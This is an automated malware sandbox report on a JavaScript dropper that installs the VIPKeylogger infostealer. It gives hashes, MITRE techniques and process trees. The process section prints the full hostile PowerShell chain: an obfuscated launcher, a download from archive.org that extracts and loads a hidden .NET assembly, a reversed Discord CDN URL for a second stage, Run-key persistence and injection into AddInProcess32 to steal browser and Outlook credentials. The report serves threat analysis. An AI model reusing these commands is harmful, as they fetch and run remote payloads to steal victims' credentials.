Resubmissions
29/08/2024, 01:48
240829-b78d1sxfjd 10 Analysis
-
max time kernel
136s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system -
submitted
29/08/2024, 01:48
Static task
static1
Behavioral task
behavioral1
Sample
SOLICITUD DE COTIZACIÓN CONSULTA ABB1VCF349750R09095.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
SOLICITUD DE COTIZACIÓN CONSULTA ABB1VCF349750R09095.js
Resource
win10v2004-20240802-en
General
-
Target
SOLICITUD DE COTIZACIÓN CONSULTA ABB1VCF349750R09095.js
-
Size
615KB
-
MD5
3b76608f01f7d04c7f25d4d967bee3fc
-
SHA1
086e7223511a9292efffc218e5041cf941203751
-
SHA256
2119893dc47b5db45de446a7ae2cee26d9306617d6eb99ecdaad3bf276682da0
-
SHA512
1cb4c2906da652068a552ae2f93c94cb1a6f21c8e4a268f66c02acc55f587a0bea47322d62b9faac5e0785cb04e91967eb3d8cd450c4493b9b168c1e498f567e
-
SSDEEP
12288:UWaIMfBcvb0vq/EJYjfJ5dguMEDuHq7muy8EGnmYPaNM13tc46J4YGy7yW8oBYUU:UWYA9/IzrBJHbMP5d
Malware Config
Extracted
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
Extracted
vipkeylogger
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious access to, or copy of, a web browser credential store.
-
Blocklisted process makes network request 2 IoCs
flow | pid | Process
7 | 2596 | powershell.exe
24 | 2596 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Runs PowerShell with the display window hidden.
pid | Process
2936 | powershell.exe
2596 | powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | wscript.exe
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | AddInProcess32.exe
Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | AddInProcess32.exe
Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | AddInProcess32.exe
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\pessegueiro.js" | powershell.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
26 | checkip.dyndns.org
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 2596 set thread context of 3616 | 2596 | powershell.exe | 100
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | AddInProcess32.exe
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid | Process
2936 | powershell.exe
2936 | powershell.exe
2596 | powershell.exe
2596 | powershell.exe
2596 | powershell.exe
2596 | powershell.exe
2596 | powershell.exe
2596 | powershell.exe
3616 | AddInProcess32.exe
3616 | AddInProcess32.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2936 | powershell.exe
Token: SeDebugPrivilege | 2596 | powershell.exe
Token: SeDebugPrivilege | 3616 | AddInProcess32.exe
Suspicious use of WriteProcessMemory 21 IoCs
description | pid | Process | procid_target
PID 656 wrote to memory of 2936 | 656 | wscript.exe | 86
PID 656 wrote to memory of 2936 | 656 | wscript.exe | 86
PID 2936 wrote to memory of 2596 | 2936 | powershell.exe | 88
PID 2936 wrote to memory of 2596 | 2936 | powershell.exe | 88
PID 2596 wrote to memory of 3424 | 2596 | powershell.exe | 94
PID 2596 wrote to memory of 3424 | 2596 | powershell.exe | 94
PID 2596 wrote to memory of 2032 | 2596 | powershell.exe | 98
PID 2596 wrote to memory of 2032 | 2596 | powershell.exe | 98
PID 2596 wrote to memory of 2032 | 2596 | powershell.exe | 98
PID 2596 wrote to memory of 2532 | 2596 | powershell.exe | 99
PID 2596 wrote to memory of 2532 | 2596 | powershell.exe | 99
PID 2596 wrote to memory of 2532 | 2596 | powershell.exe | 99
PID 2596 wrote to memory of 3616 | 2596 | powershell.exe | 100
PID 2596 wrote to memory of 3616 | 2596 | powershell.exe | 100
PID 2596 wrote to memory of 3616 | 2596 | powershell.exe | 100
PID 2596 wrote to memory of 3616 | 2596 | powershell.exe | 100
PID 2596 wrote to memory of 3616 | 2596 | powershell.exe | 100
PID 2596 wrote to memory of 3616 | 2596 | powershell.exe | 100
PID 2596 wrote to memory of 3616 | 2596 | powershell.exe | 100
PID 2596 wrote to memory of 3616 | 2596 | powershell.exe | 100
PID 2596 wrote to memory of 3616 | 2596 | powershell.exe | 100
outlook_office_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | AddInProcess32.exe
outlook_win_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | AddInProcess32.exe
Processes
-
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE COTIZACIÓN CONSULTA ABB1VCF349750R09095.js"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 blob elided]';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('β β¨ β β³ β','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&0543281f1eb0b4b1a8a310bd381ad94bbd105a287a25ec79a72fed902422e9c1=mh&92b1fc66=si&9ac60d66=xe?txt.ekanS/0722766227383338721/0255869752869238721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'pessegueiro','AddInProcess32','desativado'))"
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\pessegueiro.js"
PID:3424
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
PID:2032
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
PID:2532
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3616
-
-
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
3KB
MD5 f41839a3fe2888c8b3050197bc9a0a05
SHA1 0798941aaf7a53a11ea9ed589752890aee069729
SHA256 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA512 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82